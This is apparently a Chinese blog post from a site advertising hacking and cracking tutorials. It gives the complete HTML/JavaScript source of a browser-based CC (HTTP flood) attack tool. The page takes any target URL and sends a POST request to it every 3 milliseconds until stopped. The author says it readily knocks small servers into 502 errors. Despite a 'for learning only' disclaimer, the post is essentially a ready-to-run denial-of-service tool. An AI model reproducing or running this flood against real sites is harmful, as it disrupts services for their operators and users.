子沫
使用JS实现CC网站攻击
04/11
本文最后更新于2021年04月11日,已超过1377天没有更新。如果文章内容或图片资源失效,请留言反馈,我会及时处理,谢谢!
今天兴趣来潮,使用原生js写了一个cc攻击,当然只是简单的写一下,对小服务器来说,可以轻松的压出502,服务器牛逼的话,没什么效果,比如本站就是小服务器,cc压下就502了,下面是源码,仅供学习使用.
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8" />
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1.0" />
<title>Document</title>
<style>
body {
display: flex;
align-items: center;
justify-content: center;
}
input {
height: 35px;
padding: 0 10px;
box-sizing: border-box;
outline: none;
}
</style>
</head>
<body>
<input type="text" placeholder="请输入需要被CC的网址" style="margin-right: 10px" />
<input type="button" value="开始" />
<script>
let timer = null;
const input = document.querySelector('input[type="text"]');
const button = document.querySelector('input[type="button"]');
button.addEventListener('click', function () {
const url = input.value;
if (!url) return alert('请输入需要被压的域名');
if (!url.startsWith('http')) return alert('请输入http或https开头的网址');
if (this.value === '开始') {
this.value = '停止';
timer = setInterval(() => {
const xhr = new XMLHttpRequest();
xhr.open('POST', url, true);
xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
xhr.send('name=name');
}, 3);
} else {
this.value = '开始';
clearInterval(timer);
}
});
</script>
</body>
</html>
版权属于:
Strjson博客-专注于各种精品源码、精品软件、技术教程分享、黑客技术、破解教程(爱你在心口难开、没事写一写)
本文链接:
https://jpgke.com/lg/308.html(转载时请注明本文出处及文章链接)
作品采用: